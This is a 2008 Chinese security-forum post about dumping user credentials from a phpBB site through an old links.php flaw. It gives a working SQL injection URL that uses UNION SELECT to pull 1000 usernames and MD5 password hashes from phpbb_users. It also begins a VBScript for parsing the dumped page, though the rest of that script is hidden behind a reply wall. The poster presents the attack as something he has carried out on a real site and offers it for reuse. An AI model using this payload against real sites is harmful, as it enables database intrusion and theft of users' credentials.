【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 来段代码提取用户名和md5 [打印本页]

作者: 平湖秋月 时间: 2008-9-13 22:06 标题: 来段代码提取用户名和md5

搞了个phpbb的站，用的是很老的links.php漏洞了。注入代码如下:

links.php?t=search&search_keywords=asd&start=1,1 UNION SELECT 1,username,user_password,4,5,6,7,8,9,10,11,12,13 FROM phpbb_users where user_id limit 0,1000/*

这样就提取了1000个用户名和md5，将上边的保存成htm，要挨个提取出md5和用户名很麻烦，这段代码我很满意，估计是最简单的提取方法了，呵呵。

代码如下：

’用法示例：cscript. //Nologo this.vbs c:\11000.htm >c:\1.txt
on error resume Next
Set ie=WScript.CreateObject("InternetExplorer.Application")
set arg=wscript.arguments
if arg.count=0 then wscript.quit
ie.visible=false
ie.navigate arg(0)
While ie.Busy
WScript.Sleep 100

本帖隐藏的内容需要回复才可以浏览

作者: 3ast 时间: 2008-9-14 19:21

?????

什么东西？？？、

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)